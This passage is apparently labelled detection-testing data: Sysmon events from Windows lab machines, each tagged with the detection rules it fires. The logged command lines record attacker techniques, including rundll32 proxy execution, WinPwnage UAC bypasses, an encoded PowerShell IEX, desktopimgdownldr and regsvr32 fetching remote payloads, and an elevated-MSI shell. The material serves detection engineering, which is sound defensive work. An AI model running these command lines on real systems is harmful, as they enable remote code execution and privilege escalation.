(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"python winpwnage.py -u execute -i 9 -p c:\\Windows\\system32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-1FF8-5CD8-0000-00102A342000","ParentProcessId":1332,"ProcessGuid":"365ABB72-2006-5CD8-0000-0010A2862300","ProcessId":2960,"Product":"Microsoft® Windows® Operating 
System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 13:30:46.213"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16388,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:30:46.400506Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-208A-5CD8-0000-0010119B2400","ProcessId":3560,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:32:58.167"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16390,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:32:58.167195Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20B1-5CD8-0000-001064D62400","ProcessId":1844,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:37.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16391,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:37.078801Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-20C7-5CD8-0000-001021022500","ProcessId":1416,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:33:59.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16392,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:33:59.743077Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-1596-5CD8-0000-0020103A0100","LogonId":"0x13a10","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2006-5CD8-0000-0010E0912300","ParentProcessId":2936,"ProcessGuid":"365ABB72-21B8-5CD8-0000-0010BADE2600","ProcessId":3856,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:38:00.523"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16395,"Execution_attributes":{"ProcessID":2032,"ThreadID":1996},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:38:00.523670Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Code Execution via Pcwutl.dll","Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" pcwutl.dll,LaunchApplication c:\\Windows\\system32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-4FB5-5CD8-0000-0020F2350100","LogonId":"0x135f2","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-516B-5CD8-0000-001087E41600","ParentProcessId":3788,"ProcessGuid":"365ABB72-532E-5CD8-0000-00106C222700","ProcessId":1528,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
17:09:02.275"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16507,"Execution_attributes":{"ProcessID":2012,"ThreadID":300},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T17:09:02.275164Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["FromBase64String Command Line","Encoded FromBase64String","Suspicious Script Execution From Temp Folder","Encoded IEX"],"event":{"Event":{"EventData":{"CommandLine":"\"c:\\windows\\system32\\wscript.exe\" /E:vbs c:\\windows\\temp\\icon.ico \"powershell -exec bypass -c \"\"IEX ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('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')))\"\"\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft ® Windows Based Script Host","FileVersion":"5.812.10240.16384","Hashes":"SHA1=267D05CE8D10D97620BE1C7773757668BAEB19EE,MD5=F5E5DF6C9D62F4E940B334954A2046FC,SHA256=47CACD60D91441137D055184614B1A418C0457992977857A76CA05C75BBC1B56,IMPHASH=0F71D5F6F4CBB935CE1B09754102419C","Image":"C:\\Windows\\System32\\wscript.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-F419-5D53-0000-002026910200","LogonId":"0x29126","ParentCommandLine":"C:\\Windows\\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding","ParentImage":"C:\\Windows\\explorer.exe","ParentProcessGuid":"747F3D96-F639-5D53-0000-001092EE2600","ParentProcessId":6000,"ProcessGuid":"747F3D96-F639-5D53-0000-0010B0FC2600","ProcessId":8180,"Product":"Microsoft ® Windows Script Host","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-14 
11:53:29.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":10662,"Execution_attributes":{"ProcessID":2004,"ThreadID":4480},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-08-14T11:53:30.022856Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"Cmd.Exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-EF3D-5EFE-0000-0010F3653401","ParentProcessId":5384,"ProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ProcessId":1932,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.001"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305352,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.037922Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Command"],"event":{"Event":{"EventData":{"CommandLine":"desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"desktopimgdownldr.exe","FileVersion":"10.0.17763.1075 (WinBuild.160101.0800)","Hashes":"SHA1=BCDDCFFCA3754875261EF1427EC4F5F4BFB8C2CE,MD5=A6DAD18B0AA125535C7FB9BBFDA25266,SHA256=0A6A2690C68CF685D8FCC9F3EA78C35BBF6F296B7B33C956B39400DF749DBC78,IMPHASH=F8D617766CF1026390A712DFC1AE2EDA","Image":"C:\\Windows\\System32\\desktopimgdownldr.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-1CE4-5EFE-0000-0020CC9C0800","LogonId":"0x89ccc","OriginalFileName":"desktopimgdownldr.exe","ParentCommandLine":"cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-F098-5EFE-0000-001012E13801","ParentProcessId":1932,"ProcessGuid":"747F3D96-F098-5EFE-0000-001090E33801","ProcessId":4604,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-03 
08:47:20.055"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":305354,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:20.073262Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Desktopimgdownldr Target File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-07-03 08:47:21.485","Image":"C:\\Windows\\System32\\svchost.exe","ProcessGuid":"747F3D96-2178-5EFE-0000-0010AADA5800","ProcessId":1556,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Personalization\\LockScreenImage\\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z","UtcTime":"2020-07-03 08:47:21.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":305356,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-07-03T08:47:21.491108Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Always Install Elevated MSI Spawned Cmd And Powershell"],"event":{"Event":{"EventData":{"CommandLine":"cmd","Company":"Microsoft 
Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"\"C:\\Windows\\Installer\\MSI4FFD.tmp\"","ParentImage":"C:\\Windows\\Installer\\MSI4FFD.tmp","ParentProcessGuid":"365ABB72-D0E4-5CC8-0000-00103CB73E00","ParentProcessId":3680,"ProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ProcessId":2892,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:49:09.276"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10153,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:49:10.198351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-C494-5CC8-0000-0020E4FF0000","LogonId":"0xffe4","ParentCommandLine":"cmd","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-D0E5-5CC8-0000-0010DADF3E00","ParentProcessId":2892,"ProcessGuid":"365ABB72-D1AB-5CC8-0000-0010DB1E4400","ProcessId":1372,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-04-30 22:52:27.588"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":10154,"Execution_attributes":{"ProcessID":1936,"ThreadID":1644},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-04-30T22:52:27.588976Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-433D-5CE0-0000-002031350100","LogonId":"0x13531","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-433C-5CE0-0000-00100FD20000","ParentProcessId":964,"ProcessGuid":"365ABB72-4612-5CE0-0000-00103D1E2600","ProcessId":2600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-18 17:51:14.254"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":18851,"Execution_attributes":{"ProcessID":2044,"ThreadID":1636},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:51:14.254967Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" advpack.dll,RegisterOCX c:\\Windows\\System32\\calc.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-2B1B-5CD8-0000-0010CCC92500","ParentProcessId":3320,"ProcessGuid":"365ABB72-2B21-5CD8-0000-001039DD2500","ProcessId":816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 14:18:09.573"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16452,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T14:18:09.589507Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-12 13:56:12.329","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ProcessId":684,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\shdocvw.url","UtcTime":"2019-05-12 
13:56:12.329"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16437,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.329626Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\rundll32.exe\" shdocvw.dll,OpenURL c:\\users\\ieuser\\appdata\\local\\temp\\shdocvw.url","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Windows host process (Rundll32)","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-2523-5CD8-0000-00204C360100","LogonId":"0x1364c","ParentCommandLine":"python winpwnage.py -u execute -i 12 -p c:\\Windows\\System32\\calc.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-25EC-5CD8-0000-0010CB0A1000","ParentProcessId":684,"ProcessGuid":"365ABB72-25FC-5CD8-0000-0010906A1300","ProcessId":2168,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-12 
13:56:12.485"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16438,"Execution_attributes":{"ProcessID":2036,"ThreadID":296},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-12T13:56:12.652868Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"msxsl.exe c:\\Users\\IEUser\\AppData\\Roaming\\Adobe\\test.dat 